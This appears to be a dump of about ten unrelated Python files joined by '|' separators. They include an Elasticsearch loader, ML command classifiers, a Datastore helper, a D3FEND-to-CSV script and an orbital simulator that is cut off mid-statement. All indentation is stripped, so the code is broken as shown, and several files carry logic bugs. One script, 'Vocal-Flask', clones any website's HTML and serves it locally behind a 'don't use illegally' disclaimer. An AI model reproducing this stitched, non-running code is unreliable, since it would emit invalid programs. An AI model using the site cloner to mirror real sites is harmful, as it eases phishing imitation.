self.assertIndicatorPurgeOldest(SMMA(20, self.input_values))
if __name__ == '__main__':
unittest.main()
|
import glob
import json
import elasticsearch as es
from elasticsearch import helpers
es_client = es.Elasticsearch(["es01:9200"])
# TODO: POST setup.json if index doesn't exist.
if not es_client.indices.exists("articles"):
body = json.load(open("setup.json"))
es_client.indices.create("articles", body)
N=100
body = []
for f in glob.glob("/input/articles_v6.json.split-*"):
print(f)
with open(f, "r") as fin:
n=0
for line in fin:
doc = json.loads(line)
body.append({'_index': "articles", '_id': doc['_id'], "_source" : doc['_source']})
if "abstract" in doc["_source"] and doc["_source"]['abstract'] == {}:
doc["_source"]["abstract"] = ''
if len(body) == N:
n+=N
print(n)
try:
es.helpers.bulk(es_client, body, request_timeout=30, max_retries=5, max_chunk_bytes=50)
except es.exceptions.ConnectionTimeout:
print("!!WARNING!! - Timeout indexing documents! Skipping this chunk.")
except es.exceptions.RequestError:
print("!!WWARNING!! - malformed article.")
body = []
response = es_client.bulk(body=body)
|
try:
import requests
except ImportError:
print('Requests Module Not Found !!')
imp = input('Do You Want To Install Requests? y/n ')
if imp=='y' or 'Y':
import os
os.system('pip install requests')
os.system('clear')
os.system('clear')
os.system('clear')
print('Installation Completed!')
print('Now Checking Flask Module')
try:
from flask import Flask
print('Program Starting..... ')
import os
import time
time.sleep(.45)
os.system('clear')
except ImportError:
print('Flask Module Not Found ')
imp = input('Do You Want To Install Flask? y/n ')
if imp=='y' or 'Y':
import os
os.system('pip install flask')
os.system('clear')
os.system('clear')
os.system('clear')
print('Installation Completed')
else:
exit();
#Importing
import time
col = '\033[1;31;40m'
def logo():
a = '''
┏┓╋┏┓╋╋╋╋╋╋╋╋╋╋┏━━┓╋╋╋┏━┳┓
┃┗┳┛┣━┳━┳━┓┏┳━━┫━┳┫┏━┓┃━┫┣┓
┗┓┃┏┫╋┃━┫╋┗┫┗┳━┫┏┫┗┫╋┗╋━┃━┫
╋┗━┛┗━┻━┻━━┻━┛╋┗┛┗━┻━━┻━┻┻┛'''
print(a)
print(col + ':::::::::::::Coded By Rc:::::::::::::')
print(':::::This Program Is Created For Testing Purposes Dont Use It For Any Illegal Purposes:::::')
time.sleep(1)
os.system('clear')
time.sleep(1)
os.system('clear')
print('\n>>>>>>>>>>>>>>>>Welcome To Vocal-Flask!!!<<<<<<<<<<<<<<<<<')
logo()
print('')
site = input('Enter Website URL Here : ')
try:
req = requests.get(site)
src = req.text
time.sleep(.34)
print('Getting Websites Source Code')
except:
print('Url Not Found Or Your Internet Is Not Available')
exit();
with open('src.html', 'w') as sorc:
r = sorc.write(src)
time.sleep(.65)
print('Saving Source Code As src.txt')
time.sleep(.23)
print('Moving The File To Template Folder ')
os.system('mv -f src.html templates')
time.sleep(.65)
print('File Moved Successfully!')
time.sleep(.45)
os.system('clear')
logo()
print("")
vol= '\033[3;37;40m'
print('Starting LocalHost At Port 5000')
print(vol + 'Localhost Started At Port Number 5000\nOpen 127.0.0.1/5000 In Your Browser To See Website')
print('\n')
from flask import Flask, render_template
app = Flask(__name__)
@app.route("/")
def hello():
return render_template('src.html')
app.run()
os.system('clear')
logo()
print('')
|
import fasttext
import os
import pandas as pd
import numpy as np
import pickle
from tqdm import tqdm
from scipy.stats import sem
from prettytable import PrettyTable
# Tensorflow
import tensorflow as tf
from tensorflow import keras
import kerastuner as kt
from kerastuner.tuners import Hyperband
# Scikit-learn
from sklearn.model_selection import GridSearchCV, RepeatedStratifiedKFold, cross_val_score, cross_validate
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from .config import *
from . import utility as ut
from .data_preprocessing import Preprocessing
def createFasttextModel(filename: str):
path: str = os.path.join("../", CONFIG.OUTPUT_DIRECTORY_NAME)
ft_model = fasttext.train_supervised(os.path.join(path, filename), \
dim=CONFIG.FT_DIMS, lr=0.5, epoch=10, verbose=1)
ft_model.save_model(os.path.join(path, 'ft_model.ftz'))
return ft_model
def _recall(y_true, y_pred):
y_true = np.ones_like(y_true)
true_positives = np.sum(np.round(np.clip(y_true * y_pred, 0, 1)))
all_positives = np.sum(np.round(np.clip(y_true, 0, 1)))
recall = true_positives / (all_positives + np.epsilon())
return recall
def _precision(y_true, y_pred):
y_true = np.ones_like(y_true)
true_positives = np.sum(np.round(np.clip(y_true * y_pred, 0, 1)))
predicted_positives = np.sum(np.round(np.clip(y_pred, 0, 1)))
precision = true_positives / (predicted_positives + np.epsilon())
return precision
def _f1_score(y_true, y_pred):
precision = _precision(y_true, y_pred)
recall = _recall(y_true, y_pred)
return 2*((precision*recall)/(precision+recall+np.epsilon()))
def nn_tune_train(data: pd.DataFrame, model_names: list)->dict:
num_classes = len(data.label.unique())
with tqdm(total=num_classes) as bar:
for X_train, X_test, y_train, y_test, label in ut.data_split_classwise(data):
bar.set_description(f'Tuning on model {label}')
for name in model_names:
tuner = Hyperband(
_build_model,
objective='val_loss',
max_epochs=50,
factor=3,
directory='hyperband',
project_name=f'slp{label}'
)
tuner.search(X_train, y_train, epochs=50, validation_data=(X_test, y_test))
best_hps = tuner.get_best_hyperparameters(num_trials=1)[0]
print(f"{name} optimal params: {best_hps}")
bar.update(1)
def _build_model(hp):
kernel_initializer_list = [
'glorot_uniform',
'glorot_normal',
'he_normal',
'he_uniform'
]
hp_learning_rate = hp.Choice('learning_rate', values=[1e-2, 1e-3, 1e-4])
hp_kernel_init = hp.Choice('kernel_initializer', values=kernel_initializer_list, \
default='glorot_normal')
model = keras.Sequential([
keras.layers.Dense(units=1, input_shape=(150,), \
kernel_initializer=hp_kernel_init, activation='sigmoid')
])
model.compile(optimizer=keras.optimizers.Adam(learning_rate=hp_learning_rate), \
loss='binary_crossentropy', metrics=['accuracy', _f1_score])
return model
def nn_modelTrain(data: pd.DataFrame, models: dict)-> dict:
'''Trains the models passed to the function on the dataframe provided.
'''
num_classes = len(data.label.unique())
with tqdm(total=num_classes) as bar:
for X_train, X_test, y_train, y_test, label in ut.data_split_classwise(data):
bar.set_description(f'Working on model {label}')
models[label]['history'] = models[label]['model'].fit(X_train, y_train, batch_size=20, \
epochs=50, validation_data=(X_test, y_test), \
verbose=0)
bar.update(1)
print("Saving models to disk...")
for m_name in models.keys():
models[m_name]['model'].save(f"../{CONFIG.NN_OUTPUT_DIRECTORY_NAME}{m_name}")
return models
def nn_modelPredict(command: str, ft_model, preprocess_obj: Preprocessing, models=None, model_names=None) -> str:
test_command_preprocessed = preprocess_obj.strpreprocessing(command)
test_command_vec = ft_model.get_sentence_vector(test_command_preprocessed)
test_command_vec = np.reshape(test_command_vec, (1, -1))
print(test_command_preprocessed)
table = PrettyTable()
table.field_names = ['Model Name', 'Predicted Probability']
proba_list = []
models_list = model_names if models is None else list(models.keys())
models = dict() if models is None else models
if len(models) == 0:
for name in model_names:
models.setdefault(name, {'model': None})
models[name]['model'] = keras.models.load_model(f"../{CONFIG.NN_OUTPUT_DIRECTORY_NAME}{name}")
for m_name in models_list:
prediction_proba = models[m_name]['model'].predict(test_command_vec)
proba_list.extend(prediction_proba[0])
table.add_row([ut.map_label(m_name), prediction_proba[0][0]])
final_prediction: str = models_list[np.argmax(proba_list)] if np.max(proba_list) > CONFIG.THRESHOLD else "Other"
print(table)
print('\nFinal Prediction: ', final_prediction)
return final_prediction
def predict(command: str, ft_model, filename: str) -> str:
# devicePresent: bool = ut.device_exists(command, ft_model)
# if devicePresent:
if filename:
loaded_model = pickle.load(open(filename, 'rb'))
command_vec = np.reshape(ft_model.get_sentence_vector(command), (1, -1))
result_proba = np.max(loaded_model.predict_proba(command_vec)[0])
if result_proba > CONFIG.THRESHOLD:
return loaded_model.classes_[np.argmax(loaded_model.predict_proba(command_vec)[0])]
else:
return 'Other'
# else:
# return 'Other'
def createPerceptronModels(model_names: list):
''' Create a perceptron for the number of models (model names or classes) passed as arguments
'''
modelDict = dict()
for name in model_names:
model = keras.Sequential([
keras.layers.Dense(units=1, input_shape=(150,), \
kernel_initializer=keras.initializers.GlorotNormal(), activation='sigmoid')
])
modelDict.setdefault(name, {'model': None})
modelDict[name]['model'] = model
return modelDict
def train(train_df: pd.DataFrame):
'''Creates and trains the models with the data passed as arguments
'''
classifierList = [
{
'model_name': SVC.__name__,
'model': SVC(probability=True, random_state=40),
'parameters': dict(C = [10e-5, 10e-4, 10e-3, 10e-2, 10e-1, 1, 10e1, 10e2, 10e4],
kernel=['linear', 'rbf', 'poly']),
'filename': '../' + CONFIG.OUTPUT_DIRECTORY_NAME + CONFIG.SVM_MODEL_SAVEFILE
},
{
'model_name': LogisticRegression.__name__,
'model': LogisticRegression(random_state=40),
'parameters': dict(C = [10e-5, 10e-4, 10e-3, 10e-2, 10e-1, 1, 10e1, 10e2, 10e4],
multi_class = ['ovr', 'multinomial'],
solver=['liblinear', 'newton-cg', 'sag', 'saga', 'lbfgs']),
'filename': '../' + CONFIG.OUTPUT_DIRECTORY_NAME + CONFIG.LR_MODEL_SAVEFILE
},
{
'model_name': KNeighborsClassifier.__name__,
'model': KNeighborsClassifier(),
'parameters': dict(n_neighbors = range(4, 9), # 9 is exclusive
weights = ['uniform', 'distance'],
algorithm=['ball_tree', 'kd_tree']),
'filename': '../' + CONFIG.OUTPUT_DIRECTORY_NAME + CONFIG.KNN_MODEL_SAVEFILE
}
]
classifiers = {}
table = PrettyTable()
table.field_names = ['Model Name', 'Train Accuracy']
X_train, y_train = train_df['sent_vec'].tolist(), train_df['y']
# print(X_train.shape, y_train.shape)
with tqdm(total=3) as bar:
for clfDetail in classifierList:
bar.set_description(f"Tuning {clfDetail['model_name']}")
clf = GridSearchCV(estimator=clfDetail['model'], param_grid=clfDetail['parameters'])
clf.fit(X_train, y_train)
classifiers[clfDetail['model_name']] = {
'model': clf,
'best_estimators': clf.best_estimator_,
'filename': clfDetail['filename'],
'train_accuracy': clf.score(X_train, y_train)
}
table.add_row([clfDetail['model_name'], clf.score(X_train, y_train)])
# print(f"\nModel: {clfDetail['model_name']}, Train Accuracy: {clf.score(X_train, y_train)}")
bar.update(1)
# Save the classifiers
for clf_name in classifiers.keys():
pickle.dump(classifiers[clf_name]['model'], open(classifiers[clf_name]['filename'], 'wb'))
print(table)
return classifiers
def test(classifiers: dict, test_df):
test_results = {}
X_test, y_test = test_df['sent_vec'].tolist(), test_df['y']
for clf_name in classifiers.keys():
clf = pickle.load(open(classifiers[clf_name]['filename'], 'rb'))
test_accuracy = clf.score(X_test, y_test)
test_results[clf_name] = {
'test_accuracy': test_accuracy
}
print(f"\nModel: {clf_name}, Test Accuracy: {test_accuracy}")
return test_results
def cross_val(classifiers: dict, train_df, test_df):
'''Performs Cross Validation using the classifiers passed to this function
and prints the performance of each classifier in terms of -
mean Accuracy and Standard Error
'''
cv = RepeatedStratifiedKFold(n_splits=5, n_repeats=5, random_state=40)
clf_scores = {}
X_train, y_train = train_df['sent_vec'].tolist(), train_df['label']
for clf_name in classifiers:
# for repeat in tqdm(range(1,16)):
model = classifiers[clf_name]['best_estimators']
# scores = _evaluate_model(model, X_train, y_train)
# scores = cross_val_score(model, X_train, y_train, scoring='f1_macro', cv=cv)
scores = cross_validate(model, X_train, y_train,
scoring=['precision_macro', 'recall_macro', 'accuracy', 'f1_macro'],
cv=5, return_train_score=True)
clf_scores[clf_name] = scores
# print(f"F1 {clf_name} - {np.mean(scores):0.3f} ({sem(scores)})")
return clf_scores
def _evaluate_model(model, X, y, repeats):
'''A Private function called to evaluate the passed model with
RepeatedStratified K-Fold CV using the repeats passed as argument.
Returns: scores
'''
cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=repeats, random_state=40)
scores = cross_val_score(model, X, y, scoring='accuracy', cv=cv)
return scores
|
#!/usr/bin/python
# Copyright 2017 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Simple tcp flow aggregation."""
import argparse
import os.path
import sys
from common import __version__
from packet_dumper import PacketDumper
from plotter import Plotter
def get_options(argv):
"""Generic option parser.
Args:
argv: list containing arguments
Returns:
argparse.ArgumentParser - generated option object
"""
# init parser
parser = argparse.ArgumentParser(description='rttcp flow aggregator.')
subparsers = parser.add_subparsers()
# independent sub-commands
parser_help = subparsers.add_parser('help', help='show help screen')
parser_help.set_defaults(subcommand='help')
parser_anal = subparsers.add_parser('analyze', help='analyze pcap file')
parser_anal.set_defaults(subcommand='analyze')
parser_plot = subparsers.add_parser('plot', help='plot analysis file')
parser_plot.set_defaults(subcommand='plot')
# common arguments
for p in (parser, parser_anal, parser_plot):
p.add_argument('-d', '--debug', action='count',
dest='debug', default=0,
help='Increase verbosity (use multiple times for more)',)
p.add_argument('--quiet', action='store_const',
dest='debug', const=-1,
help='Zero verbosity',)
p.add_argument('-v', '--version', action='version',
version=__version__)
p.add_argument('--tshark', dest='tshark',
default='tshark',
metavar='TSHARK',
help='tshark binary',)
p.add_argument('-i', '--input', dest='infile', default=None,
metavar='INPUT-FILE',
help='input file',)
p.add_argument('-o', '--output', dest='outfile', default=None,
metavar='OUTPUT-FILE',
help='output file',)
p.add_argument('--type', action='store',
dest='analysis_type', default='flow',
metavar='ANALYSIS_TYPE',
help='set the analysis type (flow, packet)')
p.add_argument('--src-reverse', dest='src_reverse', default=None,
metavar='SRC-REVERSE',
help='any packet from a src definition (cidr) as reverse',)
# plot-only arguments
parser_plot.add_argument('--title', action='store',
dest='plot_title', default='',
metavar='PLOT_TITLE',
help='set the plot title')
parser_plot.add_argument('--format', action='store',
dest='plot_format', default='pdf',
metavar='PLOT_FORMAT',
help='set the plot format')
# do the parsing
options = parser.parse_args(argv[1:])
if options.subcommand == 'help':
parser.print_help()
sys.exit(0)
return options
def main(argv):
# parse options
options = get_options(argv)
# get infile/outfile
if options.infile in (None, '-'):
options.infile = sys.stdin
else:
# ensure file exists
assert os.path.isfile(options.infile), (
'File %s does not exist' % options.infile)
if options.outfile in (None, '-'):
options.outfile = sys.stdout
# print results
if options.debug > 0:
sys.stderr.write('%s\n' % options)
# do something
if options.subcommand == 'analyze':
packet_dumper = PacketDumper(options.tshark,
options.infile,
options.outfile,
options.analysis_type,
options.debug)
packet_dumper.run()
elif options.subcommand == 'plot':
plotter = Plotter(options.infile,
options.outfile,
options.analysis_type,
options.plot_format,
options.plot_title,
options.src_reverse,
options.debug)
plotter.run()
if __name__ == '__main__':
main(sys.argv)
|
#!/usr/bin/env python
import Tkinter as Tk
root=Tk.Tk()
b=Tk.Button(root,
text="Hello!!",
)
b.pack()
cb=Tk.BooleanVar()
def disable_b():
if cb.get()==True:
b['state']='disable'
else:
b['state']='normal'
c=Tk.Checkbutton(root,
text="disabled",
variable=cb,
command=disable_b
)
c.pack()
root.mainloop()
|
#here's where we'll interact with gcloud datastore to manage the database
from google.cloud import datastore
import data
_USER_ENTITY = 'ideaHubUser'
_IDEA_ENTITY = 'idea'
def _get_client():
"""Build a datastore client."""
return datastore.Client()
def log(msg):
"""Log a simple message."""
print('ideaHub datstore: %s' % msg)
def _load_key(client, entity_type, entity_id=None, parent_key=None):
"""Load a datastore key using a particular client, and if known, the ID.
Note that the ID should be an int - we're allowing datastore to generate
them in this example.
Here we are initializing the key
if we know the entity_id then we use the entity_type, entity_id, and parent_key
Parameters
-----------
client:
data struct storing entity_type, entity_id, parent_key
username: str
client the user name of the user (generated from user.html)
entity_id: str
String containing the summary of the user (generated from user.html)
parent_key: str
A list of all of the ideas created by the user (generated from user.html)
Returns
--------
we are returning the clinet key
"""
key = None
if entity_id:
key = client.key(entity_type, entity_id, parent=parent_key)
else:
# this will generate an ID
key = client.key(entity_type)
return key
def _load_entity(client, entity_type, entity_id, parent_key=None):
"""Load a datstore entity using a particular client, and the ID."""
key = _load_key(client, entity_type, entity_id, parent_key)
entity = client.get(key)
log('retrieved entity for ' + str(entity_id))
return entity
def load_user(username, passwordhash):
"""Load a user based on the passwordhash; if the passwordhash doesn't match
the username, then this should return None.
Here is where we store the data for the user self
Parameters
-----------
username: str
The username given by login.html
password: str
The password given by login.html and see if it matches a hash values
compared to the username
Returns
--------
Returns the user if the hash matches the usernmae and returns nothing if the hash doesn't match
"""
client = _get_client()
q = client.query(kind=_USER_ENTITY)
q.add_filter('username', '=', username)
q.add_filter('passwordhash', '=', passwordhash)
for user in q.fetch():
return data.User(user['username'], user['email'], user['owned_ideas'], user['followed_ideas'])
return None
def load_idea(title):
"""
Here is where we store the data for the user self
Parameters
-----------
title: str
search to find if a valid title was searched
Returns
--------
If the valid title was found return the idea. Otherwise return nothing
"""
client = _get_client()
q = client.query(kind=_IDEA_ENTITY)
q.add_filter('title', '=', title)
for r in q.fetch():
return data.Idea(r['owner'], r['title'], r['date'], r['description'], r['image'], r['tags'])
return None
def load_all_ideas():
"""Returns all ideas in the databse. Could take a long time if there are millions of ideas, but thats a good problem
because then we've made it big and have millions of dollars"""
client = _get_client()
q = client.query(kind=_IDEA_ENTITY)
idea_list = []
for r in q.fetch():
idea_list.append(data.Idea(r['owner'], r['title'], r['date'], r['description'], r['image'], r['tags']))
return idea_list
def load_user_owned_ideas(username):
"""Return a list of titles of a user's owned ideas .
Here is where we load all the ideas made by the user
Parameters
-----------
username: str
The username is based from the entity. If it exists return all the ideas made by the owner
Returns
--------
Returns all the ideas made by the username
"""
user = _load_entity(_get_client(), _USER_ENTITY, username)
if user:
return user['owned_ideas']
else:
return []
def load_user_followed_ideas(username):
"""Return a list of titles of a user's followed ideas .
Here is where we load all the ideas followed by the username
Parameters
-----------
username: str
The username is based from the entity. If it exists return all the ideas followed by the owner
Returns
--------
Returns all the ideas followed by the user
"""
user = _load_entity(_get_client(), _USER_ENTITY, username)
if user:
return user['followed_ideas']
else:
return []
def save_user(user, passwordhash):
"""Save the user details to the datastore (passed as a user object shown in data.py)
Parameters
-----------
user:
data struct of the user being saved into the entity
passwordhash: str
load the password hash to associate with the username
Returns
--------
Loads the user profile to the entity to be accessed later
"""
client = _get_client()
entity = datastore.Entity(_load_key(client, _USER_ENTITY, user.username))
entity['username'] = user.username
entity['email'] = user.email
entity['passwordhash'] = passwordhash
entity['owned_ideas'] = user.owned_ideas
entity['followed_ideas'] = user.followed_ideas
client.put(entity)
def save_idea(idea):
"""Save an idea object (shown in data.py) to the databse"""
client = _get_client()
entity = datastore.Entity(_load_key(client, _IDEA_ENTITY))
entity['owner'] = idea.owner
entity['title'] = idea.title
entity['date'] = idea.projdate
entity['description'] = idea.description
entity['image'] = idea.image
entity['tags'] = idea.tags
client.put(entity)
def save_user_owned_ideas(username, ideas):
"""Save a list of ideas as the user's owned ideas (ideas should be a list of Strings representing the title of an idea)"""
client = _get_client()
user = _load_entity(client, _USER_ENTITY, username)
if user:
user['owned_ideas'] = ideas
client.put(user)
def save_user_followed_ideas(username, ideas):
"""Save a list of ideas as the user's owned ideas (ideas should be a list of Strings representing the title of an idea)"""
client = _get_client()
user = _load_entity(client, _USER_ENTITY, username)
if user:
user['followed_ideas'] = ideas
client.put(user)
def add_idea_to_user(username, idea):
"""Adds an idea (again, by title) to a user's list of owned ideas"""
client = _get_client()
user = _load_entity(client, _USER_ENTITY, username)
if user:
user['owned_ideas'].append(idea)
client.put(user)
def add_followed_idea_to_user(username, idea):
"""Adds an idea (again, by title) to a user's list of owned ideas"""
client = _get_client()
user = _load_entity(client, _USER_ENTITY, username)
if user:
user['followed_ideas'].append(idea)
client.put(user)
def user_exists_check(username):
"""Determine if a username already exists"""
client = _get_client()
q = client.query(kind=_USER_ENTITY)
q.add_filter('username', '=', username)
result = None
for user in q.fetch():
result = user
return result
def email_exists_check(email):
"""Determine if an email already exists"""
client = _get_client()
q = client.query(kind=_USER_ENTITY)
q.add_filter('email', '=', email)
result = None
for email in q.fetch():
result = email
return result
|
import sublime
import sublime_plugin
if int(sublime.version()) < 3000:
from sublime_haskell_common import attach_sandbox, get_cabal_project_dir_and_name_of_view, get_setting
else:
from SublimeHaskell.sublime_haskell_common import attach_sandbox, get_cabal_project_dir_and_name_of_view, get_setting
class SublimeHaskellAutobuild(sublime_plugin.EventListener):
def on_post_save(self, view):
auto_build_enabled = get_setting('enable_auto_build')
auto_check_enabled = get_setting('enable_auto_check')
auto_lint_enabled = get_setting('enable_auto_lint')
cabal_project_dir, cabal_project_name = get_cabal_project_dir_and_name_of_view(view)
# auto build enabled and file within a cabal project
if auto_build_enabled and cabal_project_dir is not None:
view.window().run_command('sublime_haskell_build_auto')
# try to ghc-mod check
elif get_setting('enable_ghc_mod'):
if auto_check_enabled and auto_lint_enabled:
view.window().run_command('sublime_haskell_ghc_mod_check_and_lint')
elif auto_check_enabled:
view.window().run_command('sublime_haskell_ghc_mod_check')
elif auto_lint_enabled:
view.window().run_command('sublime_haskell_ghc_mod_lint')
def current_cabal_build():
"""Current cabal build command"""
args = []
if get_setting('use_cabal_dev'):
args += ['cabal-dev']
else:
args += ['cabal']
args += ['build']
return attach_sandbox(args)
|
#!/usr/bin/env python3
"""
A module to work with MITRE D3FEND
"""
import argparse
import csv
import logging
from rdflib import Graph, Namespace
from rdflib.namespace import OWL, RDFS, RDF
D3FEND_JSON_LD = "https://d3fend.mitre.org/ontologies/d3fend.json"
D3FEND_NAMESPACE = "http://d3fend.mitre.org/ontologies/d3fend.owl#"
D3FEND_URL_PREFIX = "https://d3fend.mitre.org/technique/d3f"
logging.basicConfig(format='%(asctime)s - %(levelname)s: %(message)s',
level=logging.INFO)
LOGGER = logging.getLogger(__name__)
def generate_csv(args):
"""
Generates a CSV file from MITRE D3FEND JSON-LD content.
:param args: Input arguments.
"""
LOGGER.info('Transforming MITRE D3FEND JSON-LD to CSV...')
rows = []
row_header = [
"d3fend-id",
"tactic",
"label",
"definition",
"how-it-works",
"url"
]
graph = Graph()
LOGGER.debug("Loading d3fend.json from %s", D3FEND_JSON_LD)
graph.parse(location=D3FEND_JSON_LD, format='json-ld')
graph.namespace_manager.bind('rdf', RDF)
graph.namespace_manager.bind('owl', OWL)
graph.namespace_manager.bind('rdfs', RDFS)
d3fend = Namespace(D3FEND_NAMESPACE)
graph.bind('d3fend', d3fend)
for tactic in graph.subjects(RDFS.subClassOf, d3fend.DefensiveTactic):
for technique_l1 in graph.subjects(d3fend.enables, tactic):
for technique_l2 in graph.subjects(RDFS.subClassOf, technique_l1):
kb_article = graph.value(subject=technique_l2, predicate=d3fend["kb-article"])
how_it_works = ""
kb_article = kb_article.split('##') if kb_article else []
for article in kb_article:
if "How it works" in article:
how_it_works = article.replace("How it works", '').strip().rstrip('/n')
break
row = [
graph.value(subject=technique_l2, predicate=d3fend["d3fend-id"]), # de3fend-id
graph.value(subject=tactic, predicate=RDFS.label), # tactic
"{}: {}".format(
graph.value(subject=technique_l1, predicate=RDFS.label),
graph.value(subject=technique_l2, predicate=RDFS.label)
), # label
graph.value(subject=technique_l2, predicate=d3fend.definition), # definition
how_it_works, # how-it-works
"{}:{}".format(D3FEND_URL_PREFIX, technique_l2.split('#')[1]) # url
]
LOGGER.debug(row)
rows.append(row)
with open(args.output, 'w') as output_file:
csv_writer = csv.writer(output_file)
csv_writer.writerow(row_header)
csv_writer.writerows(rows)
LOGGER.info("%s has been generated successfully.", args.output)
if __name__ == '__main__':
try:
main_parser = \
argparse.ArgumentParser(
description="""This script is used to load MITER D3FEND ontology and work with it.""")
subparsers = main_parser.add_subparsers(title="Commands",
help="Available commands")
csv_parser = subparsers.add_parser("csv", help="Generates CSV file")
csv_parser.add_argument('-o', '--output', default='d3fend.csv', type=str,
help="Output csv file name. Default 'd3fend.csv'")
csv_parser.add_argument('-v', '--verbose', default=False, action='store_true',
help="More verbose")
csv_parser.set_defaults(func=generate_csv)
arguments = main_parser.parse_args()
if arguments.verbose:
LOGGER.setLevel(logging.DEBUG)
arguments.func(arguments)
except Exception as ex: # pylint: disable=broad-except
LOGGER.error(ex)
|
"""
Copyright 2013, 2014 Ricardo Tubio-Pardavila
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__author__ = 'rtubiopa@calpoly.edu'
import datetime
from datetime import timedelta as py_td
import ephem
import logging
import numpy
from services.common import gis, misc
logger = logging.getLogger('common')
class OrbitalSimulator(object):
"""
This class holds all the methods necessary for the simulation of the
passes of the Spacecraft over GroundStations.
"""
# Flag that indicates whether the simulator should assume that it is
# being used for a test and, therefore, return hard coded results. These
# hard-coded results can be used instead of unpredictable slots and,
# therefore, the behavior of the functions that depend on the results of
# the simulations can be verified.
_test_mode = False
# Flag that indicates whether the invokation of one of the methods that
# internally calls the routines for the actual mathematical simulations,
# must raise an Exception instead of properly executing the method itself.
_fail_test = False
def set_debug(self, on=True, fail=False):
"""
This method sets the OrbitalSimulator debug mode ON (on=True) or OFF
(on=False). Default: on=True
:param on: Flag that enables/disables the debug mode
:param fail: Flag that triggers a simulated exception
"""
self._test_mode = on
self._fail_test = fail
def get_debug(self):
"""Returns the debug flag for the Simulation object.
:return: boolean debug flag.
"""
return self._test_mode
# Observer for the simulation (GroundStation simulation object).
_observer = None
# Body for the simulation (Spacecraft simulation object).
_body = None
# TLE in use for the simulation (taken from Spacecraft).
_tle = None
@staticmethod
def normalize_string(l0, l1, l2):
"""Static method
Normalizes the three parameters from unicode to string, in case it is
necessary.
:param l0: Line#0 of the TLE file
:param l1: Line#1 of the TLE file
:param l2: Line#2 of the TLE file
:return: Tuple (l0, l1, l2)
OLD encoding change from str to 'ascii', Python 2.7
if isinstance(l0, str):
l0 = unicodedata.normalize('NFKD', l0).encode('ascii', 'ignore')
if isinstance(l1, str):
l1 = unicodedata.normalize('NFKD', l1).encode('ascii', 'ignore')
if isinstance(l2, str):
l2 = unicodedata.normalize('NFKD', l2).encode('ascii', 'ignore')
"""
if isinstance(l0, bytes):
l0 = str(l0, 'ascii')
if isinstance(l1, bytes):
l1 = str(l1, 'ascii')
if isinstance(l2, bytes):
l2 = str(l2, 'ascii')
return l0, l1, l2
@staticmethod
def check_tle_format(l0, l1, l2):
"""Static method
Checks whether the format for a given TLE is correct or not.
:param l0: Line#0 of the TLE file
:param l1: Line#1 of the TLE file
:param l2: Line#2 of the TLE file
:return: True if the operation could succesuffly be completed
"""
l0, l1, l2 = OrbitalSimulator.normalize_string(l0, l1, l2)
ephem.readtle(l0, l1, l2)
return True
@staticmethod
def _create_test_operational_slots(
start, end, minimum_duration=datetime.timedelta(minutes=5)
):
"""
Static method that creates the OperationalSlots to be used for
testing purposes.
:return: List with the testing OperationalSlots.
"""
if start is None:
now = misc.get_now_utc()
return [(now, now + minimum_duration)]
if end is None:
return [(start, start + minimum_duration)]
return [(start, end)]
@staticmethod
def ephem_date_2_utc_datetime(e_date):
"""
Method that converts an Ephem.date object into a Python Datetime object
located in the UTC timezone.
:param e_date: The Ephem.date object to be converted.
:return: The resulting Python UTC-aware Datetime object.
"""
return misc.localize_datetime_utc(e_date.datetime())
@staticmethod
def datetime_2_ephem_string(dt):
"""
Converts a datetime object into a string that can be used as an input
for the Ephem implementation of the Date object: 'yyyy/mm/dd hh:ii:ss'
# ### Datetime object does not
:param dt: Datetime object to be converted.
:return: String to be used as an input for the date object.
"""
if dt is None:
dt = misc.get_today_utc()
return dt.strftime("%Y/%m/%d %H:%M:%S")
@staticmethod
def dbtle_2_ephem_str(spacecraft_tle):
"""
Converts into the proper format required by the Ephem objects the TLE
information contained in the database object.
:param spacecraft_tle: TLE object from the database.
:return: (name, line_1, line_2) in str format.
"""
return misc.unicode_2_string(spacecraft_tle.identifier),\
misc.unicode_2_string(spacecraft_tle.first_line),\
misc.unicode_2_string(spacecraft_tle.second_line)
def set_groundstation(self, groundstation):
"""
Creates an PyEphem observer object with the data from a GroundStation
object.
:param groundstation: Object from where to take the data required
"""
self._observer = ephem.Observer()
self._observer.lat = gis.decimal_2_degrees(groundstation.latitude)
self._observer.lon = gis.decimal_2_degrees(groundstation.longitude)
self._observer.horizon = gis.decimal_2_degrees(
groundstation.contact_elevation
)
self._observer.elevation = groundstation.altitude
def set_spacecraft(self, spacecraft_tle):
"""
Creates an PyEphem body object with the data from a Spacecraft object.
:param spacecraft_tle: Spacecraft's tle as obtained by invoking the
method "get" of the <services.configuration.models.TwoLineElement>.
"""
self._tle = spacecraft_tle
l0, l1, l2 = OrbitalSimulator.dbtle_2_ephem_str(spacecraft_tle)
self._body = OrbitalSimulator.create_spacecraft(l0, l1, l2)
@staticmethod
def create_spacecraft(l0, l1, l2):
"""
Method to convert a Spacecraft object from the database into a PyEphem
spacecraft that can be used with that same library for simulation
purposes.
:param l0: Line#0 of the TLE file.
:param l1: Line#1 of the TLE file.
:param l2: Line#2 of the TLE file.
:return: The object that has to be used with the PyEphem library.
:raises: ObjectDoesNotExist in case there is no cush tle_id in the
database.
"""
l0, l1, l2 = OrbitalSimulator.normalize_string(l0, l1, l2)
return ephem.readtle(l0, l1, l2)
@staticmethod
def get_update_duration():
"""Update window duration.
This method returns the number of days for which the slots should be
populated in the future.
:return: Number of days as a datetime.timedelta object.
"""
return datetime.timedelta(days=1)
@staticmethod
def get_update_window():
"""Population window slot.
Static method that returns the time window for which the slots should
be populated. Initially the slots should be populated from the end of
the simulation window to N days after.
:return: 2-tuple object with the start and the end of the window.
"""
s_window = OrbitalSimulator.get_simulation_window()
return (
